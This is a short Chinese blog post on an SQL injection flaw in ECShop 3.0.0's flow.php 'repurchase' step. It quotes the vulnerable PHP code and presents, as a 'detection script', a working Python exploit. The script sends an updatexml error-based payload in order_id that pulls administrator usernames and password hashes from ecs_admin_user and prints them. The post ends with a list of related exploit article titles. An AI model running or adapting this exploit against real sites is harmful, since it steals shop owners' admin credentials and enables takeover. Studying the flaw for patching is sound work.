ecshop3.0.0注入
2016-09-07 12:04
148 查看
配个环境来演示给别人看。。分析一下。flow.php文件缺陷,order_id在post请求没有单引号保护。造成注入
ecshop3.0.0注入检测脚本:(无聊写了个脚本)
<?php elseif ($_REQUEST['step'] == 'repurchase') { include_once('includes/cls_json.php'); $order_id = strip_tags($_POST['order_id']); $order_id = json_str_iconv($order_id); $user_id = $_SESSION['user_id']; $json = new JSON; $order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id); if (!$order) { $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']); die($json->encode($result)); } $db->query('DELETE FROM ' .$ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE); $order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id); $result = array('error' => 0, 'message' => ''); foreach ($order_goods as $goods) { $spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']); if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) { $result = false; $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']); } } die($json->encode($result)); }
ecshop3.0.0注入检测脚本:(无聊写了个脚本)
#coding:utf-8 #ecshop 3.0.0 flow.php sql injection #author:jwong import requests import re import sys def get_md5(url): headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0" } payload = {"order_id":"1 or updatexml(1,(select concat(0x3a,user_name,0x3a,password,0x3e) from ecs_admin_user),1)#" } urls = url + '/flow.php?step=repurchase' req = requests.post(urls,data=payload,headers=headers) print req.content if req.status_code == 200 and req: pattern = re.compile("XPATH syntax error: '(.*?)'") info = re.findall(pattern,req.content)[0] new_list = info.split(':') password = new_list[-1] username = new_list[1] print username + ':' + password if __name__ == '__main__': if len(sys.argv) < 2: print 'usage python ecshop.py url' exit() url = sys.argv[1] if 'http://' not in url: url = 'http://' + url get_md5()
相关文章推荐
- ECSHOP全版本注入漏洞分析
- ECSHOP全版本注入漏洞(二次注入)
- ecshop二次注入
- ECShop全版本注入0day及修复
- ecshop3.0.0 release0518 SQL注入
- ECSHOP屏蔽SQL提示 防止ECSHOP注入
- ECSHOP全版本注入0DAY
- ecshop支付漏洞手工注入 解决方案
- ECSHOP 搜索注入漏洞利用exp及后台拿shell
- ECSHOP全版本注入漏洞分析
- 将注入进行到底之---------Windows挂钩实现Dll注入 汇编实现
- 项目构建之maven篇:4.坐标与依赖及spring依赖注入demo
- SPRING IN ACTION 第4版笔记-第二章-003-以Java形式注入Bean、@Bean的用法
- ecshop添加类似于精品,新品,热销的模块
- jQuery+Ajax实现表格数据不同列标题排序(为表格注入活力)
- VC下提前注入进程的一些方法3——修改程序入口点
- 2014任务,研究透thinkphp源码和ecshop源码
- spring依赖注入基础
- 【AutoFac】依赖注入和控制反转的使用
- 旅店里的无线网络中的恶意脚本注入